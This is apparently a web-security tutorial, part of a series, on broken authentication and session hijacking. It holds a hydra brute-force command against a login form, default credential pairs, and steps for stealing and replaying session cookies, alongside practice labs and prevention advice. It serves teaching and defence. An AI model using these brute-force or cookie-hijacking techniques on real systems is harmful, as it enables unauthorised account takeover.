Hack That Shit
Broken Authentication & Session Hijacking

Broken Authentication & Session Hijacking

by

💡 Introduction

Authentication is how users log in and prove their identity. If it’s broken — it’s game over.

In this part, you’ll learn how to:

  • ✅ Brute-force weak login forms

  • ✅ Exploit poor session handling

  • ✅ Hijack cookies and impersonate users

  • ✅ Prevent these issues as a developer

⚠️ What Is Broken Authentication?

A vulnerability that allows attackers to:

  • Bypass login

  • Steal or forge session tokens

  • Reuse leaked credentials

  • Stay logged in as someone else

Often caused by:

  • Weak password policies

  • No rate limiting

  • Insecure session cookies

  • Exposed tokens

🧪 Brute-Forcing Login Forms

ry brute-forcing common credentials:

admin / admin  
admin / password  
user / 123456

Use Burp Suite Intruder or:

hydra -l admin -P rockyou.txt http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"

Look for:

  • No lockouts

  • No CAPTCHA

  • No rate limiting

🍪 Session Hijacking via Cookies

If session tokens are predictable or not protected:

Steps:

  1. Log in as a user

  2. Grab the Set-Cookie header:

PHPSESSID=abcd1234

  1. Log in as another user

  2. Replace your cookie with the stolen one

  3. Refresh → You’re in their account!

Tools:

  • Burp Suite Proxy & Repeater

  • Firefox Cookie Editor

💉 Insecure Token Example

Some apps use:

/profile.php?auth=eyJhbGciOiJIUzI1NiJ9...

Attackers might:

  • Replay tokens

  • Decode JWTs with weak secrets

  • Discover base64-encoded credentials

🔥 Exploiting “Remember Me” Features

Poorly implemented “Remember Me” can:

  • Store unhashed passwords in cookies

  • Reuse the same token for every session

  • Allow token replay

🧰 Practice Targets

  • DVWA → Brute Force module

  • bWAPP → Insecure Login, Session Fixation

  • Juice Shop → Broken Auth, JWT Bugs

🛡️ How to Prevent Broken Authentication

From the dev side:

✅ Use:

  • Strong password policies

  • Multi-Factor Authentication (MFA)

  • Secure session cookies (HttpOnly, Secure, SameSite)

  • JWTs with strong secrets and expiry

  • Rate limiting + CAPTCHA

🚫 Avoid:

  • Hardcoded or default credentials

  • Tokens that don’t expire

  • GET requests for login/session management

🔚 Wrapping Up

You’ve learned how attackers:

  • Brute-force weak credentials

  • Hijack sessions via cookies

  • Abuse poor session management

And how to secure your apps against all of it.

👉 Up Next:
Part 9 – Cross-Site Request Forgery (CSRF): Hijacking Sessions Silently

This is where attackers trick users into making unwanted requests while logged in — silently and dangerously.

Leave a comment

Table of Contents

Index